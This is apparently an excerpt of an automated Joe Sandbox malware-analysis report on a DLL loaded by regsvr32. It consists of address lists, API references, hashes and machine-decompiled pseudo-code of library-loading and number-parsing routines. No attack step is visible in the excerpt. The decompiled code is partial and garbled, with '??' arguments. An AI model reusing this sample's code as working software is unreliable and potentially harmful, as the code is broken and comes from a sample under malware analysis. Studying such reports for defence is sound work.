                                                                      0x180035a3d
                                                                      0x180035a40
                                                                      0x180035a44
                                                                      0x180035a48
                                                                      0x180035a50
                                                                      0x180035a57
                                                                      0x180035a5f
                                                                      0x180035a62
                                                                      0x180035a65
                                                                      0x180035a6a
                                                                      0x180035a70
                                                                      0x180035a7a
                                                                      0x180035a87
                                                                      0x180035a8e
                                                                      0x180035a92
                                                                      0x180035a96
                                                                      0x180035a9a
                                                                      0x180035aa2
                                                                      0x180035aaa
                                                                      0x180035ab4
                                                                      0x180035abd
                                                                      0x180035ac6
                                                                      0x180035acc
                                                                      0x180035ad0
                                                                      0x180035ad5
                                                                      0x180035ada
                                                                      0x180035ade
                                                                      0x180035ae4
                                                                      0x180035ae7
                                                                      0x180035aef
                                                                      0x180035af3
                                                                      0x180035af7
                                                                      0x180035afc
                                                                      0x180035aff
                                                                      0x180035b03
                                                                      0x180035b07
                                                                      0x180035b12
                                                                      0x180035b17
                                                                      0x180035b21
                                                                      0x180035b23
                                                                      0x180035b26
                                                                      0x180035b2d
                                                                      0x180035b33
                                                                      0x180035b38
                                                                      0x180035b45
                                                                      0x180035b4c
                                                                      0x180035b50
                                                                      0x180035b54
                                                                      0x180035b58
                                                                      0x180035b5d
                                                                      0x180035b65
                                                                      0x180035b6a
                                                                      0x180035b74
                                                                      0x180035b7e
                                                                      0x180035b83
                                                                      0x180035b8d
                                                                      0x180035b92
                                                                      0x180035b99
                                                                      0x180035ba5
                                                                      0x180035ba9
                                                                      0x180035bad
                                                                      0x180035bb1
                                                                      0x180035bba
                                                                      0x180035bbd
                                                                      0x180035bc0
                                                                      0x180035bda

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Name::operator+$Name::operator+=
                                                                      • String ID: {for
                                                                      • API String ID: 179159573-864106941
                                                                      • Opcode ID: 7b05b2013980730d42749da06614bb2b87b9d16a4ef9bd65ba50839d7817058d
                                                                      • Instruction ID: 03bff861b182b61c80c236cec5bf017b8a4978e5162f900cd2636418a8d47fd3
                                                                      • Opcode Fuzzy Hash: 7b05b2013980730d42749da06614bb2b87b9d16a4ef9bd65ba50839d7817058d
                                                                      • Instruction Fuzzy Hash: D5514872600B88A9F7939F24D4813ED77A5E349788F85C016FA8C07BA5DF78C698C350
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 50%
                                                                      			E00000001180046BBC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                      				intOrPtr _t61;
                                                                      				intOrPtr _t65;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr _t68;
                                                                      				struct HINSTANCE__* _t81;
                                                                      				long long _t85;
                                                                      				void* _t89;
                                                                      				struct HINSTANCE__* _t94;
                                                                      				long _t97;
                                                                      				void* _t100;
                                                                      				signed long long _t101;
                                                                      				WCHAR* _t104;
                                                                      
                                                                      				 *((long long*)(_t89 + 8)) = __rbx;
                                                                      				 *((long long*)(_t89 + 0x10)) = _t85;
                                                                      				 *((long long*)(_t89 + 0x18)) = __rsi;
                                                                      				_t101 = _t100 | 0xffffffff;
                                                                      				_t61 =  *((intOrPtr*)(0x180000000 + 0x74208 + _t81 * 8));
                                                                      				if (_t61 == _t101) goto 0x80046ceb;
                                                                      				if (_t61 != 0) goto 0x80046ced;
                                                                      				if (__r8 == __r9) goto 0x80046ce3;
                                                                      				_t67 =  *((intOrPtr*)(0x180000000 + 0x741f0 + __rsi * 8));
                                                                      				if (_t67 == 0) goto 0x80046c2e;
                                                                      				if (_t67 != _t101) goto 0x80046cc5;
                                                                      				goto 0x80046c99;
                                                                      				r8d = 0x800;
                                                                      				LoadLibraryExW(_t104, _t100, _t97);
                                                                      				_t68 = _t61;
                                                                      				if (_t61 != 0) goto 0x80046ca5;
                                                                      				if (GetLastError() != 0x57) goto 0x80046c87;
                                                                      				_t14 = _t68 + 7; // 0x7
                                                                      				r8d = _t14;
                                                                      				if (E00000001180046E40(__r8) == 0) goto 0x80046c87;
                                                                      				r8d = 0;
                                                                      				LoadLibraryExW(??, ??, ??);
                                                                      				if (_t61 != 0) goto 0x80046ca5;
                                                                      				 *((intOrPtr*)(0x180000000 + 0x741f0 + __rsi * 8)) = _t101;
                                                                      				goto 0x80046c0c;
                                                                      				_t21 = 0x180000000 + 0x741f0 + __rsi * 8;
                                                                      				_t65 =  *_t21;
                                                                      				 *_t21 = _t61;
                                                                      				if (_t65 == 0) goto 0x80046cc5;
                                                                      				FreeLibrary(_t94);
                                                                      				GetProcAddress(_t81);
                                                                      				if (_t65 == 0) goto 0x80046ce3;
                                                                      				 *((intOrPtr*)(0x180000000 + 0x74208 + _t81 * 8)) = _t65;
                                                                      				goto 0x80046ced;
                                                                      				 *((intOrPtr*)(0x180000000 + 0x74208 + _t81 * 8)) = _t101;
                                                                      				return 0;
                                                                      			}















                                                                      0x180046bbc
                                                                      0x180046bc1
                                                                      0x180046bc6
                                                                      0x180046be1
                                                                      0x180046bee
                                                                      0x180046bfa
                                                                      0x180046c03
                                                                      0x180046c0c
                                                                      0x180046c15
                                                                      0x180046c21
                                                                      0x180046c26
                                                                      0x180046c2c
                                                                      0x180046c3b
                                                                      0x180046c41
                                                                      0x180046c47
                                                                      0x180046c4d
                                                                      0x180046c58
                                                                      0x180046c5a
                                                                      0x180046c5a
                                                                      0x180046c6f
                                                                      0x180046c71
                                                                      0x180046c79
                                                                      0x180046c85
                                                                      0x180046c91
                                                                      0x180046ca0
                                                                      0x180046caf
                                                                      0x180046caf
                                                                      0x180046caf
                                                                      0x180046cba
                                                                      0x180046cbf
                                                                      0x180046ccb
                                                                      0x180046cd4
                                                                      0x180046cd9
                                                                      0x180046ce1
                                                                      0x180046ce3
                                                                      0x180046d09

                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,0000000180046842,?,?,?,00000001800368E0,?,?,?,?,0000000180004A1D), ref: 0000000180046C41
                                                                      • GetLastError.KERNEL32(?,?,?,0000000180046842,?,?,?,00000001800368E0,?,?,?,?,0000000180004A1D), ref: 0000000180046C4F
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,0000000180046842,?,?,?,00000001800368E0,?,?,?,?,0000000180004A1D), ref: 0000000180046C79
                                                                      • FreeLibrary.KERNEL32(?,?,?,0000000180046842,?,?,?,00000001800368E0,?,?,?,?,0000000180004A1D), ref: 0000000180046CBF
                                                                      • GetProcAddress.KERNEL32(?,?,?,0000000180046842,?,?,?,00000001800368E0,?,?,?,?,0000000180004A1D), ref: 0000000180046CCB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: MZx$api-ms-
                                                                      • API String ID: 2559590344-259127448
                                                                      • Opcode ID: 884d2258ed108685c756262ffc1ad68fe550c97098a0d63df019f70ef237a978
                                                                      • Instruction ID: a3962abcc103e192a65aeb1f1a3c9e2bcb43f9e5078d8715b3d31c122fb9bf0a
                                                                      • Opcode Fuzzy Hash: 884d2258ed108685c756262ffc1ad68fe550c97098a0d63df019f70ef237a978
                                                                      • Instruction Fuzzy Hash: 6D31A631B12B4881EE939B52A8807E53394F74CBE8F5A8525BD6D47761FF38C6498305
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 46%
                                                                      			E00000001180046AB0(long long __rbx, void* __rcx, void* __rdx, long long __rdi, signed int __rsi, long long __rbp, void* __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                      				signed long long _t38;
                                                                      				intOrPtr _t42;
                                                                      				signed long long _t43;
                                                                      				signed long long _t61;
                                                                      				long _t65;
                                                                      				void* _t68;
                                                                      				WCHAR* _t71;
                                                                      
                                                                      				_t38 = _t61;
                                                                      				 *((long long*)(_t38 + 8)) = __rbx;
                                                                      				 *((long long*)(_t38 + 0x10)) = __rbp;
                                                                      				 *((long long*)(_t38 + 0x18)) = __rsi;
                                                                      				 *((long long*)(_t38 + 0x20)) = __rdi;
                                                                      				if (__rdx == __r8) goto 0x80046b74;
                                                                      				_t42 =  *((intOrPtr*)(0x180000000 + 0x741f0 + __rsi * 8));
                                                                      				if (_t42 == 0) goto 0x80046b02;
                                                                      				if (_t42 != 0xffffffff) goto 0x80046bae;
                                                                      				goto 0x80046b67;
                                                                      				r8d = 0x800;
                                                                      				LoadLibraryExW(_t71, _t68, _t65);
                                                                      				_t43 = _t38;
                                                                      				if (_t38 != 0) goto 0x80046b95;
                                                                      				if (GetLastError() != 0x57) goto 0x80046b5b;
                                                                      				_t12 = _t43 + 7; // 0x7
                                                                      				r8d = _t12;
                                                                      				if (E00000001180046E40(__r8) == 0) goto 0x80046b5b;
                                                                      				r8d = 0;
                                                                      				LoadLibraryExW(??, ??, ??);
                                                                      				if (_t38 != 0) goto 0x80046b95;
                                                                      				 *((intOrPtr*)(0x180000000 + 0x741f0 + __rsi * 8)) = _t38 | 0xffffffff;
                                                                      				if (__rdx + 4 != __r8) goto 0x80046ae6;
                                                                      				return 0;
                                                                      			}










                                                                      0x180046ab0
                                                                      0x180046ab3
                                                                      0x180046ab7
                                                                      0x180046abb
                                                                      0x180046abf
                                                                      0x180046ad9
                                                                      0x180046ae8
                                                                      0x180046af4
                                                                      0x180046afa
                                                                      0x180046b00
                                                                      0x180046b0f
                                                                      0x180046b15
                                                                      0x180046b1b
                                                                      0x180046b21
                                                                      0x180046b2c
                                                                      0x180046b2e
                                                                      0x180046b2e
                                                                      0x180046b43
                                                                      0x180046b45
                                                                      0x180046b4d
                                                                      0x180046b59
                                                                      0x180046b5f
                                                                      0x180046b6e
                                                                      0x180046b94

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: MZx$api-ms-
                                                                      • API String ID: 2559590344-259127448
                                                                      • Opcode ID: 31a62064e811f3cec94525692ea968dd5e9219cda513762d3ce1e32657f47c2d
                                                                      • Instruction ID: c4c0966842e206d6e7783b9aadba4a03e5c91b3bf873f94752f59911904d87fb
                                                                      • Opcode Fuzzy Hash: 31a62064e811f3cec94525692ea968dd5e9219cda513762d3ce1e32657f47c2d
                                                                      • Instruction Fuzzy Hash: 43219431B01F1481EE929B56984439967A5FB4CBF4F598224EE39877E0EF38C689C345
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$Load$ErrorFreeLast
                                                                      • String ID: MZx$api-ms-$ext-ms-
                                                                      • API String ID: 3813093105-2431898299
                                                                      • Opcode ID: 88c7ffc25cd2065a88bac496c9f8392c73be69c6cfac9c457c91d4d6c841e0f1
                                                                      • Instruction ID: 0305e4e4d7e8d8819eabf16fb728d7cb0ed063725358e9ec81ff0f485895f36b
                                                                      • Opcode Fuzzy Hash: 88c7ffc25cd2065a88bac496c9f8392c73be69c6cfac9c457c91d4d6c841e0f1
                                                                      • Instruction Fuzzy Hash: 8321783131260881EEE7CB5698403D963A5BB4C7F4F198620EE3D47BD6DF78C6499700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 16%
                                                                      			E000000011800379E4(void* __ecx, long long __rbx, void* __rcx, signed int __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                      				void* _t32;
                                                                      				void* _t47;
                                                                      				intOrPtr _t48;
                                                                      				signed long long _t49;
                                                                      				signed long long _t53;
                                                                      				void* _t75;
                                                                      				void* _t78;
                                                                      				struct HINSTANCE__* _t79;
                                                                      
                                                                      				_t47 = _t75;
                                                                      				 *((long long*)(_t47 + 8)) = __rbx;
                                                                      				 *((long long*)(_t47 + 0x10)) = __rbp;
                                                                      				 *((long long*)(_t47 + 0x18)) = __rsi;
                                                                      				 *((long long*)(_t47 + 0x20)) = __rdi;
                                                                      				_t48 =  *((intOrPtr*)(0x180000000 + 0x73930 + __rdi * 8));
                                                                      				if (_t48 == 0) goto 0x80037a25;
                                                                      				_t49 =  ==  ? __rbp : _t48;
                                                                      				goto 0x80037ac2;
                                                                      				r8d = 0x800;
                                                                      				LoadLibraryExW(??, ??, ??);
                                                                      				if (_t49 != 0) goto 0x80037a96;
                                                                      				if (GetLastError() != 0x57) goto 0x80037ab4;
                                                                      				_t12 = _t49 - 0x50; // -80
                                                                      				_t32 = _t12;
                                                                      				r8d = _t32;
                                                                      				if (E00000001180046E40(_t78) == 0) goto 0x80037ab4;
                                                                      				r8d = _t32;
                                                                      				if (E00000001180046E40(_t78) == 0) goto 0x80037ab4;
                                                                      				r8d = 0;
                                                                      				LoadLibraryExW(??, ??, ??);
                                                                      				_t53 = _t49;
                                                                      				if (_t49 == 0) goto 0x80037ab4;
                                                                      				_t13 = 0x180000000 + 0x73930 + __rdi * 8;
                                                                      				 *_t13 = _t53;
                                                                      				if ( *_t13 == 0) goto 0x80037aaf;
                                                                      				FreeLibrary(_t79);
                                                                      				goto 0x80037ac2;
                                                                      				 *((intOrPtr*)(0x180000000 + 0x73930 + __rdi * 8)) = _t53 | 0xffffffff;
                                                                      				return 0;
                                                                      			}











                                                                      0x1800379e4
                                                                      0x1800379e7
                                                                      0x1800379eb
                                                                      0x1800379ef
                                                                      0x1800379f3
                                                                      0x180037a06
                                                                      0x180037a13
                                                                      0x180037a1c
                                                                      0x180037a20
                                                                      0x180037a32
                                                                      0x180037a38
                                                                      0x180037a44
                                                                      0x180037a4f
                                                                      0x180037a51
                                                                      0x180037a51
                                                                      0x180037a57
                                                                      0x180037a68
                                                                      0x180037a6a
                                                                      0x180037a7e
                                                                      0x180037a80
                                                                      0x180037a88
                                                                      0x180037a8e
                                                                      0x180037a94
                                                                      0x180037a99
                                                                      0x180037a99
                                                                      0x180037aa4
                                                                      0x180037aa9
                                                                      0x180037ab2
                                                                      0x180037ab8
                                                                      0x180037adc

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$Load$ErrorFreeLast
                                                                      • String ID: MZx$api-ms-$ext-ms-
                                                                      • API String ID: 3813093105-2431898299
                                                                      • Opcode ID: 40ca59b6c9561c2e381141adcef63662d0c0f391516c24f73f07fa3254396f04
                                                                      • Instruction ID: 72b02a25ef51868992c41b9cece14d27be9b485ba61231a16d8ff7d0628dcc7a
                                                                      • Opcode Fuzzy Hash: 40ca59b6c9561c2e381141adcef63662d0c0f391516c24f73f07fa3254396f04
                                                                      • Instruction Fuzzy Hash: 1D218331321B5881FAE7DB5698403A92395BB8DBE4F198625EE2D877D1DF38C749C301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 65%
                                                                      			E00000001180021D18(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long _a8, intOrPtr _a16, long long _a24) {
                                                                      				void* _v64;
                                                                      				intOrPtr _v68;
                                                                      				intOrPtr _v72;
                                                                      				intOrPtr _v76;
                                                                      				intOrPtr _v80;
                                                                      				intOrPtr _v84;
                                                                      				intOrPtr _v88;
                                                                      				intOrPtr _v92;
                                                                      				intOrPtr _v96;
                                                                      				intOrPtr _v100;
                                                                      				intOrPtr _v104;
                                                                      				intOrPtr _v108;
                                                                      				intOrPtr _v112;
                                                                      				intOrPtr _v116;
                                                                      				intOrPtr _v120;
                                                                      				intOrPtr _v124;
                                                                      				intOrPtr _v128;
                                                                      				intOrPtr _v132;
                                                                      				intOrPtr _v136;
                                                                      				intOrPtr _v140;
                                                                      				intOrPtr _v144;
                                                                      				intOrPtr _v148;
                                                                      				intOrPtr _v152;
                                                                      				long long _v160;
                                                                      				long long _v168;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				signed int _t134;
                                                                      				void* _t154;
                                                                      				void* _t184;
                                                                      				signed short _t197;
                                                                      				signed short _t198;
                                                                      				signed int _t199;
                                                                      				signed int _t246;
                                                                      				signed int _t248;
                                                                      				signed int _t250;
                                                                      				signed int _t254;
                                                                      				signed int _t257;
                                                                      				signed short* _t371;
                                                                      				signed short* _t372;
                                                                      				signed short* _t374;
                                                                      				signed short** _t375;
                                                                      				long long _t376;
                                                                      				long long* _t379;
                                                                      				signed short* _t380;
                                                                      				signed short* _t381;
                                                                      				signed short** _t385;
                                                                      				long long* _t386;
                                                                      				long long* _t387;
                                                                      				signed short** _t388;
                                                                      				void* _t389;
                                                                      				signed short* _t394;
                                                                      				signed short* _t395;
                                                                      				long long _t396;
                                                                      				intOrPtr _t397;
                                                                      				long long _t398;
                                                                      				signed short* _t399;
                                                                      
                                                                      				_t385 = __rdx;
                                                                      				_t376 = __rbx;
                                                                      				_a24 = __rbx;
                                                                      				_a8 = __rcx;
                                                                      				_t398 =  *__rdx;
                                                                      				r12d = 0;
                                                                      				_v64 = _t398;
                                                                      				r14d = r8d;
                                                                      				_t388 = __rdx;
                                                                      				if (_t398 != 0) goto 0x80021d5f;
                                                                      				E0000000118003BFFC(_t398, __rax);
                                                                      				 *__rax = 0x16;
                                                                      				E0000000118003A794();
                                                                      				goto 0x80021d91;
                                                                      				if (r14d == 0) goto 0x80021da9;
                                                                      				if (__r8 - 2 - 0x22 <= 0) goto 0x80021da9;
                                                                      				_v160 = __rcx;
                                                                      				r9d = 0;
                                                                      				 *((char*)(__rcx + 0x30)) = 1;
                                                                      				r8d = 0;
                                                                      				 *(__rcx + 0x2c) = 0x16;
                                                                      				_v168 = _t396;
                                                                      				E0000000118003AA20(__rax, __rbx, __rcx, __rdx, __rdx, _t389, __r8);
                                                                      				_t379 = _t388[1];
                                                                      				if (_t379 == 0) goto 0x800223c9;
                                                                      				 *_t379 =  *_t388;
                                                                      				goto 0x800223c9;
                                                                      				_t380 = _t398 + 2;
                                                                      				_t134 = r9b & 0xffffffff;
                                                                      				_t256 = r12d;
                                                                      				 *_t385 = _t380;
                                                                      				_t253 =  !=  ? _t134 : _t134 | 0x00000002;
                                                                      				if ((0x0000fffd & _t376 - 0x0000002b) != 0) goto 0x80021dde;
                                                                      				_t197 =  *_t380 & 0x0000ffff;
                                                                      				_t14 =  &(_t380[1]); // 0x2
                                                                      				_t371 = _t14;
                                                                      				 *_t388 = _t371;
                                                                      				_a16 = 0xa70;
                                                                      				_v152 = 0xae6;
                                                                      				_v148 = 0xaf0;
                                                                      				_v144 = 0xb66;
                                                                      				r8d = 0x660;
                                                                      				_v140 = 0xb70;
                                                                      				_t20 = _t371 - 0x80; // 0x5e0
                                                                      				r9d = _t20;
                                                                      				_v136 = 0xc66;
                                                                      				r10d = 0x6f0;
                                                                      				_v132 = 0xc70;
                                                                      				r11d = 0x966;
                                                                      				_v128 = 0xce6;
                                                                      				_v124 = 0xcf0;
                                                                      				_v120 = 0xd66;
                                                                      				_v116 = 0xd70;
                                                                      				_v112 = 0xe50;
                                                                      				_v108 = 0xe5a;
                                                                      				_v104 = 0xed0;
                                                                      				_v100 = 0xeda;
                                                                      				_v96 = 0xf20;
                                                                      				_v92 = 0xf2a;
                                                                      				_v88 = 0x1040;
                                                                      				_v84 = 0x104a;
                                                                      				_v80 = 0x17e0;
                                                                      				_v76 = 0x17ea;
                                                                      				_v72 = 0x1810;
                                                                      				_v68 = 0xff1a;
                                                                      				if ((r14d & 0xffffffef) != 0) goto 0x8002214c;
                                                                      				if (_t197 - 0x30 < 0) goto 0x8002209b;
                                                                      				if (_t197 - 0x3a >= 0) goto 0x80021eea;
                                                                      				goto 0x80022096;
                                                                      				if (_t197 - 0xff10 >= 0) goto 0x80022087;
                                                                      				if (_t197 - r8w < 0) goto 0x8002209b;
                                                                      				if (_t197 - 0x66a >= 0) goto 0x80021f12;
                                                                      				goto 0x80022096;
                                                                      				if (_t197 - r10w < 0) goto 0x8002209b;
                                                                      				if (_t197 - 0x6fa >= 0) goto 0x80021f31;
                                                                      				goto 0x80022096;
                                                                      				if (_t197 - r11w < 0) goto 0x8002209b;
                                                                      				if (_t197 - 0x970 >= 0) goto 0x80021f50;
                                                                      				goto 0x80022096;
                                                                      				if (_t197 - r9w < 0) goto 0x8002209b;
                                                                      				if (_t197 - 0x9f0 >= 0) goto 0x80021f6f;
                                                                      				goto 0x80022096;
                                                                      				if (_t197 - (_t197 & 0x0000ffff) - r9d < 0) goto 0x8002209b;
                                                                      				if (_t197 - _a16 >= 0) goto 0x80021f8f;
                                                                      				goto 0x80022096;
                                                                      				if (_t197 - _v152 < 0) goto 0x8002209b;
                                                                      				if (_t197 - _v148 < 0) goto 0x80021ee0;
                                                                      				if (_t197 - _v144 < 0) goto 0x8002209b;
                                                                      				if (_t197 - _v140 < 0) goto 0x80021ee0;
                                                                      				if (_t197 - _v136 < 0) goto 0x8002209b;
                                                                      				if (_t197 - _v132 < 0) goto 0x80021ee0;
                                                                      				if (_t197 - _v128 < 0) goto 0x8002209b;
                                                                      				if (_t197 - _v124 < 0) goto 0x80021ee0;
                                                                      				if (_t197 - _v120 < 0) goto 0x8002209b;
                                                                      				if (_t197 - _v116 < 0) goto 0x80021ee0;
                                                                      				if (_t197 - _v112 < 0) goto 0x8002209b;
                                                                      				if (_t197 - _v108 < 0) goto 0x80021ee0;
                                                                      				if (_t197 - _v104 < 0) goto 0x8002209b;
                                                                      				if (_t197 - _v100 < 0) goto 0x80021ee0;
                                                                      				if (_t197 - _v96 < 0) goto 0x8002209b;
                                                                      				if (_t197 - _v92 < 0) goto 0x80021ee0;
                                                                      				if (_t197 - _v88 < 0) goto 0x8002209b;
                                                                      				if (_t197 - _v84 < 0) goto 0x80021ee0;
                                                                      				if (_t197 - _v80 < 0) goto 0x8002209b;
                                                                      				if (_t197 - _v76 < 0) goto 0x80021ee0;
                                                                      				if ((_t197 & 0x0000ffff) - _v72 - 9 > 0) goto 0x8002209b;
                                                                      				goto 0x80021ee0;
                                                                      				if (_t197 - _v68 >= 0) goto 0x8002209b;
                                                                      				if ((_t197 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x800220bd;
                                                                      				_t64 = _t380 - 0x41; // -17
                                                                      				_t65 = _t380 - 0x61; // -49
                                                                      				_t154 = _t65;
                                                                      				if (_t64 - 0x19 <= 0) goto 0x800220b2;
                                                                      				if (_t154 - 0x19 > 0) goto 0x8002213d;
                                                                      				if (_t154 - 0x19 > 0) goto 0x800220ba;
                                                                      				_t66 = _t380 - 0x37; // -231
                                                                      				if (_t66 != 0) goto 0x8002213d;
                                                                      				_t381 =  *_t388;
                                                                      				r9d = 0xffdf;
                                                                      				_t246 =  *_t381 & 0x0000ffff;
                                                                      				_t67 =  &(_t381[1]); // 0xffe1
                                                                      				_t394 = _t67;
                                                                      				 *_t388 = _t394;
                                                                      				_t68 = _t385 - 0x58; // 0x698
                                                                      				if ((r9w & _t68) == 0) goto 0x80022125;
                                                                      				 *_t388 = _t381;
                                                                      				_t158 =  !=  ? r14d : 8;
                                                                      				r14d =  !=  ? r14d : 8;
                                                                      				if (_t246 == 0) goto 0x8002211d;
                                                                      				if ( *_t381 == _t246) goto 0x8002211d;
                                                                      				E0000000118003BFFC( *_t381 - _t246, _t371);
                                                                      				 *_t371 = 0x16;
                                                                      				E0000000118003A794();
                                                                      				r8d = 0x660;
                                                                      				r10d = 0x6f0;
                                                                      				r11d = 0x966;
                                                                      				goto 0x8002214c;
                                                                      				r8d = 0x660;
                                                                      				goto 0x8002214c;
                                                                      				_t198 =  *_t394 & 0x0000ffff;
                                                                      				_t71 =  &(_t394[1]); // 0xffe3
                                                                      				_t372 = _t71;
                                                                      				 *_t388 = _t372;
                                                                      				r8d = 0x660;
                                                                      				goto 0x80022142;
                                                                      				_t163 =  !=  ? r14d : 0xa;
                                                                      				r14d = 0xa;
                                                                      				_t164 = ( !=  ? r14d : 0xa) | 0xffffffff;
                                                                      				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                      				_t248 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                      				r13d = 0x30;
                                                                      				r15d = 0xff10;
                                                                      				r9d = 0xa / r14d;
                                                                      				if (_t198 - r13w < 0) goto 0x8002231c;
                                                                      				if (_t198 - 0x3a >= 0) goto 0x8002217e;
                                                                      				goto 0x80022317;
                                                                      				if (_t198 - r15w >= 0) goto 0x80022307;
                                                                      				if (_t198 - r8w < 0) goto 0x8002231c;
                                                                      				if (_t198 - 0x66a >= 0) goto 0x800221a7;
                                                                      				goto 0x80022317;
                                                                      				if (_t198 - r10w < 0) goto 0x8002231c;
                                                                      				if (_t198 - 0x6fa >= 0) goto 0x800221c6;
                                                                      				goto 0x80022317;
                                                                      				if (_t198 - r11w < 0) goto 0x8002231c;
                                                                      				if (_t198 - 0x970 >= 0) goto 0x800221e5;
                                                                      				goto 0x80022317;
                                                                      				if (_t198 - 0x9e6 < 0) goto 0x8002231c;
                                                                      				_t76 =  &(_t372[5]); // 0x9f0
                                                                      				if (_t198 - _t76 >= 0) goto 0x80022205;
                                                                      				goto 0x80022317;
                                                                      				if (_t198 - 0xa66 < 0) goto 0x8002231c;
